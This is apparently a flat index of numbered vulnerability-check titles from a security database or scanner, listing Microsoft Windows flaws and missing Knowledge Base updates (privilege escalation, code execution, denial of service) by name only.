[60696] Microsoft Windows kernel-mode drivers input privilege escalation [60695] Microsoft Windows kernel-mode drivers memory privilege escalation [60694] Microsoft Windows kernel-mode drivers exception privilege escalation [60693] Microsoft Windows kernel-mode drivers denial of service [60692] Microsoft Windows Knowledge Base Article 982214 update is not installed [60691] Microsoft Windows SMB stack denial of service [60690] Microsoft Windows SMB variable denial of service [60689] Microsoft Windows SMB pool code execution [60688] Microsoft Windows Knowledge Base Article 982665 update is not installed [60687] Microsoft Windows Cinepak Codec code execution [60686] Microsoft Windows Knowledge Base Article 2115168 update is not installed [60685] Microsoft Windows MPEG Layer-3 Codecs code execution [60684] Microsoft Windows Knowledge Base Article 2079403 update is not installed [60683] Microsoft Windows XML Core Services (MSXML) code execution [60682] Microsoft Windows Knowledge Base Article 982799 update is not installed [60681] Microsoft Windows Tracing Feature privilege escalation [60680] Microsoft Windows Knowledge Base Article 2264072 update is not installed [60679] Microsoft Windows registry key ACL privilege escalation [60678] Microsoft Windows Service Isolation privilege escalation [60677] Microsoft Windows Knowledge Base Article 983539 update is not installed [60676] Microsoft Windows LSASS privilege escalation [60422] Microsoft Windows .lnk file code execution [60120] Microsoft Windows NtUserCheckAccessForIntegrityLevel() privilege escalation [60095] Microsoft Windows UpdateFrameTitleForDocument() buffer overflow [59901] Microsoft Windows Knowledge Base Article 2229593 update is not installed [59898] Microsoft Windows Knowledge Base Article 2229593 update is not installed [59895] Microsoft Windows Knowledge Base Article 978212 update is not installed [59891] Microsoft Windows Knowledge Base Article 982335 update is not installed [59447] Microsoft Windows Help and Support Center GetServerName cross-site scripting [59267] Microsoft Windows helpctr.exe command execution [58944] Microsoft Windows Knowledge Base Article 979902 update not installed [58943] Microsoft Windows MJPEG code execution [58942] Microsoft Windows media files code execution [58913] Microsoft Windows Knowledge Base Article 2027452 update is not installed [58891] Microsoft Windows Knowledge Base Article 2028554 update is not installed [58887] Microsoft Windows kernel-mode drivers TrueType privilege escalation [58885] Microsoft Windows Knowledge Base Article 980218 update is not installed [58884] Microsoft Windows OpenType Compact Font Format privilege escalation [58883] Microsoft Windows Knowledge Base Article 981343 update is not installed [58871] Microsoft Windows Knowledge Base Article 982381 update is not installed [58865] Microsoft Windows Knowledge Base Article 982666 update is not installed [58863] Microsoft Windows Knowledge Base Article 983235 update is not installed [58622] Microsoft Windows Canonical Display Driver (cdd.dll) code execution [58345] Microsoft Windows SMTP Service query id spoofing [58344] Microsoft Windows SMTP Service DNS spoofing [58243] Microsoft Office SharePoint Server and Microsoft Windows SharePoint Services help.aspx cross-site scripting [58173] Microsoft Windows Knowledge Base Article 978542 update is not installed [58172] Microsoft Outlook Express and Windows Mail client integer overflow [58171] Microsoft Windows Knowledge Base Article 978213 update is not installed [58060] Microsoft Windows SfnINSTRING() privilege escalation [58059] Microsoft Windows SfnLOGONNOTIFY() denial of service [57601] Microsoft Windows kernel exceptions denial of service [57600] Microsoft Windows kernel image file denial of service [57599] Microsoft Windows kernel path denial of service [57597] Microsoft Windows kernel registry keys denial of service [57596] Microsoft Windows kernel symbolic links denial of service [57595] Microsoft Windows kernel registry keys denial of service [57580] Microsoft Windows Knowledge Base Article 981210 update is not installed [57579] Microsoft Windows Cabinet File Viewer (cabview.dll) code execution [57578] Microsoft Windows WinVerifyTrust signature validation code execution [57380] Microsoft Windows Knowledge Base Article 979683 update is not installed [57379] Microsoft Windows kernel symbolic link privilege escalation [57378] Microsoft Windows kernel memory privilege escalation [57377] Microsoft Windows Knowledge Base Article 979559 update is not installed [57376] Microsoft Windows kernel-mode drivers windows privilege escalation [57375] Microsoft Windows kernel-mode drivers objects privilege escalation [57374] Microsoft Windows Knowledge Base Article 977816 update is not installed [57372] Microsoft Windows Knowledge Base Article 978338 update is not installed [57370] Microsoft Windows ISATAP IPv6 spoofing [57343] Microsoft Windows Knowledge Base Article 979402 update is not installed [57342] Microsoft Windows Media Player ActiveX control code execution [57341] Microsoft Windows Knowledge Base Article 980094 update is not installed [57337] Microsoft Windows Knowledge Base Article 980195 update is not installed [57336] Microsoft Windows Knowledge Base Article 980232 update is not installed [57335] Microsoft Windows SMB message code execution [57334] Microsoft Windows SMB transaction responses code execution [57333] Microsoft Windows SMB code execution [57332] Microsoft Windows SMB memory privilege escalation [57330] Microsoft Windows Knowledge Base Article 980858 update is not installed [57329] Microsoft Windows Media Services info packets buffer overflow [57328] Microsoft Windows Knowledge Base Article 981160 update is not installed [57326] Microsoft Windows Knowledge Base Article 981169 update is not installed [57325] Microsoft Windows Knowledge Base Article 981832 update is not installed [57324] Microsoft Windows SMTP Service Simple Mail Transfer Protocol memory information disclosure [57323] Microsoft Windows SMTP Service and Microsoft Exchange SMTP DNS Mail Exchanger (MX) denial of service [57322] Microsoft Windows Knowledge Base Article 980182 update is not installed [57205] Microsoft Windows Media Player .AVI code execution [56853] Microsoft Windows MS HTML Help ActiveX control (hhctrl.ocx) HtmlHelpA() code execution [56756] Microsoft Windows .ani file denial of service [56591] Microsoft Windows API denial of service [56560] Microsoft Windows winhlp32.exe buffer overflow [56558] Microsoft Windows MsgBox() code execution [56470] Microsoft Windows Knowledge Base Article 980150 update is not installed [56461] Microsoft Windows Knowledge Base Article 975561 update is not installed [56435] Microsoft Windows Media Player .mpg denial of service [56218] Microsoft Windows DNS weak security [55935] Microsoft Windows Knowledge Base Article 975713 update is not installed [55934] Microsoft Windows Knowledge Base Article 978037 update is not installed [55933] Microsoft Windows Client/Server Run-time Subsystem (CSRSS) privilege escalation [55932] Microsoft Windows Knowledge Base Article 978214 update is not installed [55930] Microsoft Windows Knowledge Base Article 977935 update is not installed [55928] Microsoft Windows Knowledge Base Article 978706 update is not installed [55926] Microsoft Windows Knowledge Base Article 977894 update is not installed [55925] Microsoft Windows Hyper-V instruction set denial of service [55924] Microsoft Windows Knowledge Base Article 977377 update is not installed [55923] Microsoft Windows Knowledge Base Article 977290 update is not installed [55922] Microsoft Windows Kerberos Ticket-Granting-Ticket (TGT) denial of service [55921] Microsoft Windows Knowledge Base Article 977165 update is not installed [55920] Microsoft Windows kernel privilege escalation [55917] Microsoft Windows Knowledge Base Article 978262 update is not installed [55910] Microsoft Windows Knowledge Base Article 971468 update is not installed [55909] Microsoft Windows SMB NTLM privilege escalation [55908] Microsoft Windows SMB NULL denial of service [55907] Microsoft Windows SMB denial of service [55906] Microsoft Windows SMB pathname code execution [55898] Microsoft Windows Knowledge Base Article 974145 update is not installed [55897] Microsoft Windows TCP/IP SACK denial of service [55896] Microsoft Windows TCP/IP Route Information code execution [55895] Microsoft Windows TCP/IP stack datagram code execution [55894] Microsoft Windows TCP/IP ICMPv6 code execution [55890] Microsoft Windows Knowledge Base Article 975416 update is not installed [55779] Microsoft Windows Knowledge Base Article 978207 update is not installed [55742] Microsoft Windows #GP trap handler privilege escalation [55680] Microsoft Windows Media Player ActiveX control code execution [55560] Microsoft Windows XP Flash Player code execution [55153] Microsoft Windows Knowledge Base Article 978251 update is not installed [55152] Microsoft Windows Server Message Block client code execution [55151] Microsoft Windows Server Message Block pool code execution [55150] Microsoft Windows Knowledge Base Article 972270 update is not installed [55149] Microsoft Windows EOT font buffer overflow [54645] Microsoft Internet Explorer and Windows Media player Intel Indeo codec code execution [54644] Microsoft Internet Explorer and Windows Media player Intel Indeo codec code execution [54643] Microsoft Internet Explorer and Windows Media player Intel Indeo41 codec buffer overflow [54642] Microsoft Internet Explorer and Windows Media player Intel Indeo41 codec buffer overflow [54445] Microsoft Windows Knowledge Base Article 975539 update is not installed [54443] Microsoft Windows Knowledge Base Article 974392 update is not installed [54442] Microsoft Windows Local Security Authority Subsystem Service (LSASS) denial of service [54440] Microsoft Windows Knowledge Base Article 974318 update is not installed [54439] Microsoft Windows Internet Authentication Service (IAS) privilege escalation [54438] Microsoft Windows Internet Authentication Service (IAS) code execution [54427] Microsoft Windows Knowledge Base Article 971726 update is not installed [54426] Microsoft Windows Active Directory Federation Services (ADFS) code execution [54425] Microsoft Windows Active Directory Federation Services (ADFS) spoofing [54424] Microsoft Windows Knowledge Base Article 967183 update is not installed [54422] Microsoft Windows Knowledge Base Article 976325 update is not installed [54217] Microsoft Windows KeAccumulateTicks() denial of service [54012] Microsoft Windows Knowledge Base Article 972652 update is not installed [53991] Microsoft Windows Knowledge Base Article 973309 update is not installed [53990] Microsoft Windows ADAM LDAP denial of service [53986] Microsoft Windows Knowledge Base Article 973565 update is not installed [53985] Microsoft Windows WSDAPI code execution [53981] Microsoft Windows Knowledge Base Article 974783 update is not installed [53980] Microsoft Windows 2000 License Logging Server buffer overflow [53977] Microsoft Windows Knowledge Base Article 976307 update is not installed [53975] Microsoft Windows Knowledge Base Article 969947 update is not installed [53974] Microsoft Windows kernel font code execution [53973] Microsoft Windows kernel GDI privilege escalation [53972] Microsoft Windows kernel NULL pointer privilege escalation [53551] Microsoft Windows Knowledge Base Article KB973525 update is not installed [53550] Microsoft Windows Knowledge Base Article 974112 update is not installed [53549] Microsoft Windows Media Player ASF file buffer overflow [53548] Microsoft Windows Knowledge Base Article 971486 update is not installed [53547] Microsoft Windows kernel exception handler denial of service [53546] Microsoft Windows kernel user mode privilege escalation [53545] Microsoft Windows kernel 64-bit truncation privilege escalation [53544] Microsoft Windows Knowledge Base Article 974455 update is not installed [53541] Microsoft Windows Knowledge Base Article 969059 update is not installed [53540] Microsoft Windows Indexing Service ActiveX control code execution [53537] Microsoft Windows Knowledge Base Article 974571 update is not installed [53536] Microsoft Windows CryptoAPI ASN.1 spoofing [53535] Microsoft Windows CryptoAPI NULL spoofing [53534] Microsoft Windows Knowledge Base Article 975254 update is not installed [53533] Microsoft Windows Knowledge Base Article 957488 update is not installed [53531] Microsoft Windows GDI+ Microsoft Office file code execution [53530] Microsoft Windows GDI+ PNG image code execution [53529] Microsoft Windows GDI+ .NET Framework API code execution [53528] Microsoft Windows GDI+ TIFF image code execution [53527] Microsoft Windows GDI+ TIFF image buffer overflow [53526] Microsoft Windows GDI+ PNG image buffer overflow [53525] Microsoft Windows GDI+ WMF image code execution [53522] Microsoft Windows Knowledge Base Article 975517 update is not installed [53517] Microsoft Windows Knowledge Base Article 975682 update is not installed [53516] Microsoft Windows Media Player audio files code execution [53514] Microsoft Windows Media Player ASF code execution [53512] Microsoft Windows Knowledge Base Article 975467 update is not installed [53511] Microsoft Windows Local Security Authority Subsystem Service (LSASS) denial of service [53090] Microsoft Windows srv2.sys code execution [52948] Microsoft Windows Knowledge Base Article 973965 update is not installed [52775] Microsoft Windows Knowledge Base Article 973812 update is not installed [52774] Microsoft Windows Media Format MP3 files code execution [52773] Microsoft Windows Media Format ASF files code execution [52771] Microsoft Windows Knowledge Base Article 971961 update is not installed [52770] Microsoft Windows Jscript code execution [52403] Microsoft Windows OpenType font engine denial of service [52137] Microsoft Windows Knowledge Base Article 969706 update is not installed [52131] Microsoft Windows Knowledge Base Article 972260 update is not installed [52128] Microsoft Windows Knowledge Base Article 967723 update is not installed [52127] Microsoft Windows TCP/IP orphaned connections denial of service [52126] Microsoft Windows TCP/IP timestamps code execution [52117] Microsoft Windows Knowledge Base Article 970927 update is not installed [52116] Microsoft Windows RDP Services Client ActiveX control buffer overflow [52115] Microsoft Windows Remote Desktop Connection RDP buffer overflow [52114] Microsoft Windows Knowledge Base Article 970957 update is not installed [52113] ASP.NET Framework component of Microsoft Windows HTTP denial of service [52111] Microsoft Windows Knowledge Base Article 969883 update is not installed [52110] Microsoft Windows Windows Internet Name Service (WINS) replication partner buffer overflow [52109] Microsoft Windows Windows Internet Name Service (WINS) replication buffer overflow [52108] Microsoft Windows Knowledge Base Article 960859 update is not installed [52107] Microsoft Windows Knowledge Base Article 971032 update is not installed [52104] Microsoft Windows telnet privilege escalation [52103] Microsoft Windows Knowledge Base Article 956844 update is not installed [52102] Microsoft Windows DHTML Editing Component ActiveX control code execution [52097] Microsoft Windows Knowledge Base Article 971557 update is not installed [52096] Microsoft Windows AVI validation integer overflow [52095] Microsoft Windows AVI code execution [52093] Microsoft Windows Knowledge Base Article 971657 update is not installed [52089] Microsoft Windows Knowledge Base Article 973908 update is not installed [51636] Microsoft Windows Knowledge Base Article KB973346 update is not installed [51471] Microsoft Windows Knowledge Base Article 970811 update is not installed [51469] Microsoft Windows Knowledge Base Article 970710 update is not installed [51468] Microsoft Windows Wireless LAN AutoConfig service buffer overflow [51465] Microsoft Windows Knowledge Base Article 969856 update is not installed [51463] Microsoft Windows Knowledge Base Article 971633 update is not installed [51462] Microsoft Windows Knowledge Base Article 969516 update is not installed [51457] Microsoft Windows Knowledge Base Article 957638 update is not installed [51097] Microsoft Windows atapi.sys privilege escalation [51034] Microsoft PowerPoint Freelance Windows buffer overflow [50973] Microsoft Windows Server 2003 and Vista win32k.sys denial of service [50903] Microsoft Windows SPI_SETDESKWALLPAPER SystemParametersInfo denial of service [50826] Microsoft Windows Knowledge Base Article 969898 update is not installed [50798] Microsoft Windows Knowledge Base Article 970238 update is not installed [50795] Microsoft Windows Knowledge Base Article 969514 update is not installed [50791] Microsoft Windows Knowledge Base Article 969462 update is not installed [50783] Microsoft Windows Knowledge Base Article 968537 update is not installed [50782] Microsoft Windows desktop parameter privilege escalation [50781] Microsoft Windows system call privilege escalation [50780] Microsoft Windows kernel pointer privilege escalation [50779] Microsoft Windows kernel kernel objects privilege escalation [50778] Microsoft Windows Knowledge Base Article 963093 update is not installed [50777] Microsoft Windows Search weak security [50776] Microsoft Windows Knowledge Base Article 969897 update is not installed [50768] Microsoft Windows Knowledge Base Article 970483 update is not installed [50767] Microsoft Windows Knowledge Base Article 971055 update is not installed [50766] Microsoft Windows Knowledge Base Article 961501 update is not installed [50765] Microsoft Windows Print Spooler service privilege escalation [50763] Microsoft Windows Print Spooler service buffer overflow [50762] Microsoft Windows Knowledge Base Article 961371 update is not installed [50761] Microsoft Windows Active Directory LDAP denial of service [50760] Microsoft Windows Embedded OpenType (EOT) integer overflow [50759] Microsoft Windows 2000 Active Directory LDAP code execution [50758] Microsoft Windows EOT buffer overflow [50757] Microsoft Windows Knowledge Base Article 957632 update is not installed [50391] Microsoft Windows Media Player MID file denial of service [50281] Microsoft Windows Knowledge Base Article 967340 update is not installed [50129] Microsoft Windows gdiplus.dll PNG denial of service [49598] Microsoft Windows Knowledge Base Article 959426 update is not installed [49588] Microsoft Windows Knowledge Base Article 960477 update is not installed [49586] Microsoft Windows Knowledge Base Article 959454 update is not installed [49584] Microsoft Windows Threadpool ACL privilege escalation [49578] Microsoft Windows WMI privilege escalation [49570] Microsoft Windows Knowledge Base Article 961759 update is not installed [49569] Microsoft Windows Knowledge Base Article 960803 update is not installed [49566] Microsoft Windows HTTP services certificate spoofing [49562] Microsoft Windows HTTP services integer underflow [49560] Microsoft Windows Knowledge Base Article 961373 update is not installed [49558] Microsoft Windows Knowledge Base Article 963027 update is not installed [49547] Microsoft Windows Knowledge Base Article 968557 update is not installed [49438] Microsoft Windows GDI+ EMF EmfPlusFont Object denial of service [49435] Microsoft Windows unlzh.c and unpack.c gzip code execution [49079] Microsoft Windows DNS server memory leak denial of service [48909] Microsoft Windows Knowledge Base Article 962238 update is not installed [48908] Microsoft Windows WINS server WPAD and ISATAP registration Web proxy spoofing [48907] Microsoft Windows DNS server WPAD registration Web proxy spoofing [48906] Microsoft Windows DNS server cache response spoofing [48905] Microsoft Windows DNS server query response spoofing [48392] Microsoft Windows I/O information disclosure [48326] Microsoft Windows Knowledge Base Article 960715 update is not installed [48312] Microsoft Windows Knowledge Base Article 959420 update is not installed [48311] Microsoft Windows Knowledge Base Article 961260 update not installed [48308] Microsoft Windows Knowledge Base Article 960225 update is not installed [48307] Microsoft Windows SChannel certificate spoofing [48302] Microsoft Windows Knowledge Base Article 957634 update not installed [48301] Microsoft Windows Knowledge Base Article 958690 update is not installed [48300] Microsoft Windows kernel pointer validation privilege escalation [48299] Microsoft Windows kernel handle validation privilege escalation [48298] Microsoft Windows kernel GDI validation code execution [48295] Microsoft Windows Knowledge Base Article 974378 update not installed [48189] Microsoft Windows AutoRun feature enabled [47867] Microsoft Windows .CHM file denial of service [47760] Microsoft Windows Media Player WAV file code execution [47676] Microsoft Windows Knowledge Base Article 958687 update not installed [47674] Microsoft Windows SMB NT Trans2 request code execution [47673] Microsoft Windows SMB NT Trans request buffer overflow [47672] Microsoft Windows Knowledge Base Article 959239 update not installed [47664] Microsoft Windows Media Player WAV or SND file denial of service [47428] Microsoft Windows Knowledge Base Article 960714 update is not installed [46870] Microsoft Windows Knowledge Base Article 959807 update is not installed [46869] Microsoft Windows Media Components ISATAP information disclosure [46868] Microsoft Windows Media Components SPN NTLM credentials code execution [46867] Microsoft Windows Knowledge Base Article 959349 update is not installed [46866] Microsoft Windows search-ms protocol code execution [46865] Microsoft Windows saved search file code execution [46864] Microsoft Windows Knowledge Base Article 959070 update is not installed [46861] Microsoft Windows Knowledge Base Article 958215 update not installed [46856] Microsoft Windows Knowledge Base Article 957175 update is not installed [46853] Microsoft Windows Knowledge Base Article 957173 update not installed [46844] Microsoft Windows Knowledge Base Article 956802 update is not installed [46843] Microsoft Windows GDI WMF image file buffer overflow [46842] Microsoft Windows GDI WMF image file integer overflow [46742] Microsoft Windows Vista iphlpapi.dll buffer overflow [46670] Microsoft Communicator, Office Communications Server (OCS) and Windows Live Messenger RTCP unspecified denial of service [46506] Microsoft Windows UnhookWindowsHookEx() denial of service [46385] Microsoft Windows Media Player MIDI or DAT file denial of service [46194] Microsoft Windows Knowledge Base Article 957097 update is not installed [46191] Microsoft Windows SMB NTLM credentials code execution [46190] Microsoft Windows Knowledge Base Article 932349 update is not installed [46188] Microsoft Visual Basic Windows Common ActiveX control AVI buffer overflow [46102] Microsoft Windows 2003 SP2 is not installed on the system [46101] Microsoft Windows 2003 SP1 is not installed on the system [46100] Microsoft Windows XP Service Pack 3 is not installed on the system [46099] Microsoft Windows XP Service Pack 1 is not installed on the system [46042] Microsoft Windows Knowledge Base Article 958644 update not installed [45857] Microsoft Windows Mobile HTC Hermes device security bypass [45719] Microsoft Windows Vista page faults denial of service [45586] Microsoft Windows Knowledge Base Article 957280 update is not installed [45585] Microsoft Windows Active Directory LDAP search buffer overflow [45582] Microsoft Windows Knowledge Base Article 956803 update is not installed [45581] Microsoft Windows Knowledge Base Article 956416 update is not installed [45578] Microsoft Windows Ancillary Function Driver privilege escalation [45572] Microsoft Windows Knowledge Base Article 9556841 update is not installed [45571] Microsoft Windows Memory Manager Virtual Address Descriptors privilege escalation [45565] Microsoft Windows Knowledge Base Article 956390 update is not installed [45561] Microsoft Windows Knowledge Base Article 957095 update is not installed [45560] Microsoft Windows SMB file name buffer underflow [45557] Microsoft Windows Knowledge Base Article 955218 update is not installed [45550] Microsoft Windows Knowledge Base Article 957699 update is not installed [45548] Microsoft Windows Knowledge Base Article 953155 update is not installed [45545] Microsoft Windows Internet Printing Protocol code execution [45544] Microsoft Windows Knowledge Base Article 954211 update is not installed [45543] Microsoft Windows kernel input privilege escalation [45542] Microsoft Windows kernel system calls privilege escalation [45541] Microsoft Windows kernel new window privilege escalation [45538] Microsoft Windows Knowledge Base Article 951071 update is not installed [45537] Microsoft Message Queuing RPC code execution [45464] Microsoft Windows XP GDI+ .ICO denial of service [45463] Microsoft Windows Mobile bluetooth device name denial of service [45209] Microsoft Windows Media Player installed [45146] Microsoft Windows WRITE_ANDX SMB packet denial of service [45015] Microsoft Windows Image Aquisition Logger ActiveX control file overwrite [44727] Microsoft Windows Knowledge Base Article 956391 update not installed [44716] Microsoft Windows Knowledge Base Article 954593 update not installed [44715] Microsoft Windows GDI+ BMP header buffer overflow [44714] Microsoft Windows GDI+ WMF buffer overflow [44713] Microsoft Windows GDI+ GIF index parsing buffer overflow [44711] Microsoft Windows GDI+ EMF code execution [44710] Microsoft Windows GDI+ VML gradient buffer overflow [44708] Microsoft Windows Knowledge Base Article 955047 update not installed [44705] Microsoft Windows Knowledge Base Article 956695 update not installed [44704] Microsoft Host Integration Server SNA RPC code execution [44703] Microsoft Windows Knowledge Base Article 954156 update not installed [44700] Microsoft Windows Media Encoder wmex.dll ActiveX control buffer overflow [44625] Microsoft Windows ATL Load() code execution [44423] Microsoft Windows nslookup.exe code execution [44106] Microsoft Windows Knowledge Base Article 953839 update not installed [44099] Microsoft Windows Knowledge Base Article 953838 update not installed [44092] Microsoft Windows Knowledge Base Article 954066 update not installed [44087] Microsoft Windows Knowledge Base Article 953733 update not installed [44086] Microsoft Windows IPSec policy information disclosure [44085] Microsoft Windows Knowledge Base Article 952954 update not installed [44083] Microsoft Windows Knowledge Base Article 954154 update not installed [44082] Microsoft Windows Media Player sampling rate SSPL buffer overflow [44081] Microsoft Windows Knowledge Base Article 955048 update not installed [44080] Microsoft Windows Knowledge Base Article 955617 update not installed [44079] Microsoft Windows Knowledge Base Article 950974 update not installed [43340] Microsoft Windows Knowledge Base Article 950582 update not installed [43339] Microsoft Windows Explorer saved search file code execution [43336] Microsoft Windows Knowledge Base Article 953230 update not installed [43335] Microsoft Windows DNS Server cache poisoning [43330] Microsoft Windows Knowledge Base Article 953747 update not installed [42887] Microsoft Windows Installer msiexec.exe GUID buffer overflow [42765] Apple Safari Microsoft Windows code execution [42701] Microsoft Windows Knowledge Base Article 950760 update not installed [42699] Microsoft Windows Vista speech recognition (sapi.dll) command execution [42697] Microsoft Windows Knowledge Base Article 950762 update not installed [42696] Microsoft Windows PGM fragment option denial of service [42695] Microsoft Windows PGM option length denial of service [42693] Microsoft Windows Knowledge Base Article 950759 update not installed [42691] Microsoft Windows Knowledge Base Article 949785 update not installed [42689] Microsoft Windows Knowledge Base Article 951066 update not installed bluetooth [42685] Microsoft Windows Knowledge Base Article 951376 update not installed [42684] Microsoft Windows Knowledge Base Article 948745 update not installed [42682] Microsoft Windows Bluetooth SDP code execution [42677] Microsoft Windows Knowledge Base Article 955702 update not installed [42676] Microsoft Windows Messenger ActiveX control information disclosure [42675] Microsoft Windows Knowledge Base Article 951698 update not installed [42674] Microsoft Windows DirectX SAMI buffer overflow [42672] Microsoft Windows Knowledge Base Article 953235 update not installed [42668] Microsoft Windows Active Directory LDAP request denial of service [42358] Microsoft Windows I2O Utility Filter driver (i2omgmt.sys) code execution [42334] Microsoft Windows CE JPEG and GIF code execution [42109] Microsoft Windows Knowledge Base Article 952044 update not installed [42103] Microsoft Windows Knowledge Base Article 951208 update not installed [42101] Microsoft Windows Knowledge Base Article 951207 update not installed [42095] Microsoft Windows Knowledge Base Article 950749 update not installed [41880] Microsoft Windows MSDTC privilege escalation [41481] Microsoft Windows Knowledge Base Article 945553 update not installed [41480] Microsoft Windows DNS client spoofing [41477] Microsoft Windows Knowledge Base Article 947864 update not installed [41473] Microsoft Windows Knowledge Base Article 948590 update not installed [41472] Microsoft Windows GDI EMF filename parameter buffer overflow [41471] Microsoft Windows GDI EMF and WMF header buffer overflow [41470] Microsoft Windows Knowledge Base Article 941693 update not installed [41469] Microsoft Windows kernel usermode privilege escalation [41465] Microsoft Windows Knowledge Base Article 948881 update not installed [41463] Microsoft Windows Knowledge Base Article 941203 update not installed [41453] Microsoft Windows Knowledge Base Article 949032 update not installed [41448] Microsoft Windows Knowledge Base Article 950183 update not installed [41349] Microsoft Windows AutoPlay NoDriveTypeAutoRun weak security [40937] Microsoft Windows Knowledge Base Article 815495 update not installed [40889] Microsoft Windows Knowledge Base Article 949030 update not installed [40886] Microsoft Windows Knowledge Base Article 949031 update not installed [40879] Microsoft Windows Knowledge Base Article 949029 update not installed [40693] Microsoft Windows Video Controller ActiveX Library for streaming video (msvidctl.dll) buffer overflow [40103] Microsoft Windows Knowledge Base Article 946538 update not installed [40102] Microsoft Windows Active Directory LDAP request denial of service [40101] Microsoft Windows Knowledge Base Article 947077 update not installed [40099] Microsoft Windows Knowledge Base Article 946456 update not installed [40098] Microsoft Windows Vista DHCP denial of service [40097] Microsoft Windows Knowledge Base Article 947081 update not installed [40094] Microsoft Windows Knowledge Base Article 947085 update not installed [40091] Microsoft Windows Knowledge Base Article 944533 update not installed [40078] Microsoft Windows Knowledge Base Article 947108 update not installed [40063] Microsoft Windows Knowledge Base Article 946026 update not installed [40062] Microsoft Windows WebDAV Mini-Redirector buffer overflow [40059] Microsoft Windows Knowledge Base Article 944338 update not installed [40056] Microsoft Windows VBScript and JScript engines code execution [40048] Microsoft Windows Knowledge Base Article 947890 update not installed [40043] Microsoft Windows OLE script request buffer overflow [39453] Microsoft Windows TCP/IP Source Specific Multicasting (SSM) MLDv2 buffer overflow [39452] Microsoft Windows TCP/IP Source Specific Multicasting (SSM) IGMPv3 buffer overflow [39254] Microsoft Windows TCP/IP ICMP denial of service [39238] Microsoft Windows Knowledge Base Article 941644 update not installed [39237] Microsoft Windows Knowledge Base Article 942831 update not installed [39236] Microsoft Windows Knowledge Base Article 943485 update not installed [39233] Microsoft Windows LSASS LPC privilege escalation [39232] Microsoft Windows Knowledge Base Article 942830 update not installed [39052] Microsoft Windows DirectX MJPEG decoder code execution [38865] Cisco Security Agent for Microsoft Windows SMB buffer overflow [38850] Microsoft Windows CryptGenRandom information disclosure [38830] Microsoft Windows Media File Format Stream Property error correction buffer overflow [38829] Microsoft Windows Media File Format Stream Property error correction and type-specific buffer overflow [38828] Microsoft Windows Media File Format audio_conceal_none buffer overflow [38827] Microsoft Windows Media File Format Degradable JPEG Media Stream buffer overflow [38797] Microsoft Windows Media Player AIFF denial of service [38730] Microsoft Windows Knowledge Base Article 943078 update not installed [38729] Microsoft Windows Vista kernel ALPC privilege escalation [38728] Microsoft Windows Knowledge Base Article 944653 update not installed [38726] Microsoft Windows Knowledge Base Article 942624 update not installed [38725] Microsoft Windows Vista SMBv2 signing code execution [38723] Microsoft Windows Knowledge Base Article 941568 update not installed [38717] Microsoft Windows Knowledge Base Article 942615 update not installed [38711] Microsoft Windows Knowledge Base Article 941569 update not installed [38315] Microsoft Windows Knowledge Base Article 943460 update not installed [37284] Microsoft Windows Macrovision secdrv.sys driver buffer overflow [37249] Microsoft Windows Mobile SMS sender field obfuscation [37226] Microsoft Windows Knowledge Base Article 815495 update not installed [36980] Microsoft Windows Explorer PNG file denial of service [36961] Microsoft Windows Explorer extended attributes multiple buffer overflows [36819] Microsoft Windows Knowledge Base Article 939653 update not installed [36812] Microsoft Windows Knowledge Base Article 941202 update not installed [36811] Microsoft Outlook Express and Windows Mail NNTP response code execution [36807] Microsoft Windows Knowledge Base Article 933729 update not installed [36806] Microsoft Windows Knowledge Base Article 941672 update not installed [36805] Microsoft Windows DNS spoofing information disclosure [36804] Microsoft Windows Knowledge Base Article 942695 update not installed [36800] Microsoft Windows Knowledge Base Article 923810 update not installed [36799] Microsoft Windows Kodak image Viewer code execution [36662] Microsoft Windows Media Player meta file security bypass [36608] Microsoft Windows MFC ActiveX FindFile() buffer overflow [36490] Microsoft Windows Knowledge Base Article 942099 update not installed [36381] Microsoft Windows Knowledge Base Article 939778 update not installed [36378] Microsoft Windows UNIX services setuid binary privilege escalation [36376] Microsoft Windows Knowledge Base Article 941522 update not installed [35919] Microsoft Windows VML detected [35902] Microsoft Windows process scheduler denial of service [35897] Microsoft Windows Vista Weather Gadget code execution [35895] Microsoft Windows Media Player skin decompression code execution [35886] Microsoft Windows ARP request denial of service [35878] Microsoft Windows Media Player .AU file denial of service [35853] Microsoft Windows Vista kernel unspecified vulnerability [35816] Microsoft Windows Knowledge Base Article 940965 update not installed [35802] Microsoft Windows Vista Calendar ICS denial of service [35771] Microsoft Windows Vista Contacts Gadget code execution [35770] Microsoft Windows Vista Feed Headlines Gadget code execution [35766] Microsoft Windows Knowledge Base Article 937894 update not installed [35762] Microsoft Windows Knowledge Base Article 938127 update not installed [35761] Microsoft Windows VML vgx.dll buffer overflow [35760] Microsoft Windows Knowledge Base Article 937143 update not installed [35753] Microsoft Windows Knowledge Base Article 938827 update not installed [35746] Microsoft Windows Knowledge Base Article 938829 update not installed [35745] Microsoft Windows GDI WMF image code execution [35742] Microsoft Windows Knowledge Base Article 936782 update not installed [35741] Microsoft Windows Media Player skin parsing buffer overflow [35739] Microsoft Windows Knowledge Base Article 942017 update not installed [35582] Microsoft Windows URI protocol handling command execution [35538] Microsoft Windows Explorer GIF denial of service [35397] Microsoft Windows Vista USER32.DLL denial of service [35322] Microsoft Windows Vista firewall information disclosure [35219] Microsoft Windows Knowledge Base Article 936542 update is not installed [35216] Microsoft Windows Knowledge Base Article 933103 update not installed [35206] Microsoft Windows Knowledge Base Article 939373 update is not installed [35202] Microsoft Windows Knowledge Base Article 935807 update not installed [35199] Microsoft Windows Knowledge Base Article 936227 update not installed [35190] Microsoft Windows Knowledge Base Article 936548 update not installed [35183] Microsoft Windows Knowledge Base Article 937986 update not installed [35181] Microsoft Windows Knowledge Base Article 926122 update is not installed [35180] Microsoft Windows Active Directory LDAP denial of service [35179] Microsoft Windows Active Directory LDAP attribute buffer overflow [35059] Microsoft Windows TCP/IP Source Specific Multicasting (SSM) multiple buffer overflows [34743] Microsoft Windows GDI+ denial of service [34648] Microsoft Windows Knowledge Base Article 935839 update not installed [34645] Microsoft Windows Win32 API code execution [34642] Microsoft Windows Knowledge Base Article 935840 update not installed [34640] Microsoft Windows Knowledge Base Article 931212 update not installed .NET [34636] Microsoft Windows Schannel code execution [34634] Microsoft Windows Server 2003 Active Directory information disclosure [34633] Microsoft Windows Knowledge Base Article 933566 update not installed [34624] Microsoft Windows Knowledge Base Article 929123 update not installed [34623] Microsoft Windows MHTML Content-Disposition information disclosure [34622] Microsoft Windows MHTML URL redirect information disclosure [34618] Microsoft Windows Vista ACL user credentials information disclosure [34611] Microsoft Windows Knowledge Base Article 927051 update not installed [34599] Microsoft Windows Server 2003 terminal server security bypass [34444] Microsoft Windows unspecified code execution [34032] Microsoft Windows Knowledge Base Article 935966 update not installed [33959] 